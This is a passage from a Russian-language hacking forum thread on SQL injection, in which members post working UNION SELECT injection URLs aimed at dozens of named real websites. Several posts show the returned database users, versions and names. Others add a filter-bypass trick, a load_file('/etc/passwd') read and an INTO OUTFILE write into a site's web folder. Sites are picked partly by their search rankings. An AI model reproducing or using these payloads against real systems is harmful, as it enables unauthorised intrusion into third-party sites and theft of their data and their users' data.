SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    www.selbsthilfe-online.de
    Code:
    http://www.selbsthilfe-online.de/druckversion.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(user(),database(),version()),22,23,24,25,26--
    PR 5
    [email protected]
     
  2. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    www.krcmapraha.cz
    Code:
    http://www.krcmapraha.cz/en/rezervace-menu.php?ID=-119'%20union%20select%201,concat_ws(user(),database(),version()),3--+f
    PR 2
    [email protected]


    www.rengl.cz
    Code:
    http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,concat_ws(user(),database(),version()),3,4,5,6,7,8,9,10--+f
    PR 5
    AR 817,157

    [email protected]


    www.mikule.cz
    Code:
    http://www.mikule.cz/index.php?id=-119+union+select+1,concat_ws(user(),database(),version()),3,4,5,6,7--
    PR 2
    [email protected]
     
    #15222 DyukiN, 25 Nov 2012
    Last edited: 25 Nov 2012
  3. ukrpunk

    ukrpunk Member

    Joined:
    31 Oct 2011
    Messages:
    47
    Likes Received:
    14
    Reputations:
    5
    PR 5
    PHP:
    http://www.nda.org.za/index.php?option=3&id=1&com_id=-235+union+select+version(),2,3--
    тиц50 pr3
    PHP:
    http://www.pan-invest.com/index.php?option=products&Itemid=62&task=showCurGoods&id_cat=279&id_goods=-5374+union+select+11111,version()--
     
    #15223 ukrpunk, 2 Dec 2012
    Last edited: 2 Dec 2012
    1 person likes this.
  4. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0

    Пустышка) :)
     
  5. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    http://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=-1+/*!uNioN*//**//*!sEleCT*//**/user()+--+

    как обходить спэйсвэбовский ваф?
     
    1 person likes this.
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    _ttp://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=1+and+1=2+union+select+@@version+--+

    _ttp://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=1+and+1=2%0Aunion%0Aselect+table_name+from+information_schema.tables+limit+0,1+--+

    Используй %0A вместо пробела в связке union select

    P.S. А вообще ты темой ошибся. Тебе в соседнюю.
     
    _________________________
    1 person likes this.
  7. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.futuresfins.com/fin-detail.php?id=173+union+select+1,2,3,4,5,6,7,8,9,10,version()
    Code:
    http://choices.edu/resources/detail.php?id=37+union+select+1,2,3
    Code:
    http://www.jetonfireplace.com/ProductInfo.php?id=818+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
    Code:
    http://snakedancecondos.com/pages.php?id=10'+union+select+1,2,3
    Code:
    http://www.thedailystar.net/newDesign/pages.php?id=-04+union+select+version()
    Code:
    http://www.miamiwinefair.com/pages.php?id=-1+union+select+1,2,version()
    Code:
    http://www.enlightenmentquartet.com/index.php?id=-9+union+select+concat_ws(version(),user()),2
    Code:
    http://www.rajasthanexperience.com/pages.php?id=-1+union+select+1,2,version()
    Code:
    http://www.nau.in/announce.php?id=-595+union+select+1,2,version(),4,5,6,7,8,9,10
    Code:
    http://www.mtosmt.org/mto-announce.php?id=108+union+select+1,2,3,version(),5
    Code:
    http://www.wellerpools.com/news-read.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9,10
    Code:
    http://www.sourceisrael.com/read.php?id=-229+union+select+1,version(),3,4,5,6,7,8,9,10,11
    Code:
    http://www.dhammaweb.net/Tipitaka/read.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version()
    Code:
    http://www.hdtinfo.com/news/read.php?id=-1157947239+union+select+1,user(),3,4,5
     
    #15227 reuvenmatbil, 8 Dec 2012
    Last edited: 8 Dec 2012
  8. ArtyomVK

    ArtyomVK New Member

    Joined:
    22 Oct 2012
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.svr-oskol.ru/rus/?cid=-3%20and%201=2%20union%20select%20@@version,2--&lng=ru
     
    1 person likes this.
  9. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    online shop
    Code:
    [COLOR=YellowGreen]http://www.chinastarwholesale.com/productinfo.php?id=-228+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15[/COLOR]
    Code:
    [COLOR=DarkGreen]http://www.vietnamfoodstuff.com/productinfo.php?id=115+union+select+1,2,3,version(),5[/COLOR]
    Code:
    [COLOR=DarkGreen]http://www.euroantiquemarket.com/productinfo.php?id=p_08120510+union+select+1,2,3,4,5,6,7,8,9[/COLOR]
     
    #15229 reuvenmatbil, 10 Dec 2012
    Last edited: 10 Dec 2012
    2 people like this.
  10. comynicator

    comynicator New Member

    Joined:
    20 Mar 2012
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    http://www.virgingordabvi.com/villainfo.php?vid=61+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17+--+

    Current User: vbi_admin1@localhost
    Sql Version: 5.0.45-community-nt
    Current DB: vg_vbi_db

    // О, великий Havij !!!
    // Преклоняемся тебе, да святятся байты твои !
    // BigBear
     
    #15230 comynicator, 10 Dec 2012
    Last edited by a moderator: 10 Dec 2012
  11. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Code:
    http://www.jooproperty.com/en/?option=com_jooproperty&view=booking&layout=modal&product_id=-1+/*byn3m1s*/union+select+1,concat(user(),0x3a,database())--
    scweb24sql1@localhost:scweb24sql1
     
  12. self-profit

    self-profit New Member

    Joined:
    19 Oct 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    1
    Code:
    http://www.td-tehkomplekt.ru/index.php?id=26+union+select+1,2,3,4,5,6,7
    
    Target: http://www.td-tehkomplekt.ru/catalog.php?id=11
    DB Server: MySQL
    Current DB: td_tehkomp_db
    Data Bases: information_schema
    td_tehkomp_db

    // Логины и пароли выкладывать нельзя !!!
    // BigBear
     
    #15232 self-profit, 12 Dec 2012
    Last edited by a moderator: 12 Dec 2012
  13. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    sql'S

    1)
    Code:
    [COLOR=Sienna]http://www.generationendialog.de/aktuell.php?id=9999+union+select+null,null,concat(user(),version(),database()),null,null,null,null+--+[/COLOR]
    ----------------------------------------------------
    [COLOR=Sienna][email protected]_cms[/COLOR]
    [COLOR=Red]file_priv=Y>>>>>>>[/COLOR]
    http://www.generationendialog.de/aktuell.php?id=9999.999+union+select+null,null,'Hello%20Word',null,null,null,null%20into%20outfile%20'/home/.sites/64/site41/web/wp-content/themes/twentyten/blesse.txt'+--+
    [COLOR=Red]>>>>>>>[/COLOR]
    http://www.sroi-online.com/wp-content/themes/twentyten/blesse.txt
    (много сайтов .de на пузомерки не чекал)
    2)
    Code:
    http://www.socialworkhallofdistinction.org/honorees/item.php?id=39%20LIMIT%201,1%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,concat(user(),version(),database()),%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL
     
    #15233 blesse, 12 Dec 2012
    Last edited: 12 Dec 2012
    1 person likes this.
  14. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    _ttp://www.nacso.org/news.php?id=4'%20union%20select%201,version(),3,4--+
     
  15. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    ht tp:/ /www.uprtou.ac.in/inner.php?conf=-1198+UNION+SELECT+1,2,3,4,version( ),6 ,7,8,9,10,11,12,13,14,15,16--
    Code:
    http:/ /www.uprtou.ac.in/inner.php?conf=-1198+UN ION+SELECT +1,2,3,4,load_file('/etc/pas swd'),6,7,8,9,1 0,11,12,13,14,15,16--
     
  16. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Поздравьте с первым уловом:)

    Яндекс тИЦ (CY) 40
    Alexa Rank 4,510,468
    Google PageRank (PR) 2
    Code:
    http://www.deshe vletut.ru/brand.php?id=0&id_razdel2=-22%20union%20select%201,version(),3%20--
    Яндекс тИЦ (CY) 130
    Alexa Rank 776,218
    Google PageRank (PR) 3
    Code:
    http://www.mediums earch.com/catalog/item.php?id=-5895%20union%20select%20version(),2,3,4,5
     
    1 person likes this.
  17. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.roglianoweb.it/app/community/dettaglio_squadra. php
    ?id_squadra=-7+union +select+1,CONCAT_WS(CHAR(32,58,32),user(),databas e(),version() ),3,4-
     
    #15237 GhostW, 14 Dec 2012
    Last edited: 14 Dec 2012
  18. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.fapsparma.it/faps-prodotti.php?pagina=2&catalogo=-12+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5--
     
  19. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Code:
     http://www.stockbazzar.com/buy.php?Id=999999.9+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+ 
     
  20. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    _ttp://[I]spbf[/I].pt/cat.php?catid=-4+union+select +1,CONCAT_WS%28CHA R%2832,58,32%29,u ser%28%29,data base% 28%29,version%28%29% 29,3- -
     
Thread Status:
Not open for further replies.